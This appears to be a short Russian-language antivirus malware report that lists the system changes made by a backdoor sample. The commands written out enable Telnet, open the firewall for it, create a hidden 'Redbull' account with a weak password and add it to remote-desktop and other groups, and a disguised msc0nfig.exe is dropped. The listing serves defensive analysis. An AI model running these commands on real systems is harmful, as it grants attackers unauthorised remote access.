Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\netsh.exe firewall set allowedprogram <SYSTEM32>\tlntsvr.exe iexplorer enable
- <SYSTEM32>\net1.exe localgroup 'remote desktop users' Redbull /add
- <SYSTEM32>\net1.exe user Redbull 123456789 /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Redbull /add
- <SYSTEM32>\MSWINSCK.OCX
- %TEMP%\aut3.tmp
- %TEMP%\aut2.tmp
- %TEMP%\aut1.tmp
- <SYSTEM32>\msc0nfig.exe
- %TEMP%\aut3.tmp
- %TEMP%\aut2.tmp
- %TEMP%\aut1.tmp
- ClassName: 'Shell_TrayWnd' WindowName: ''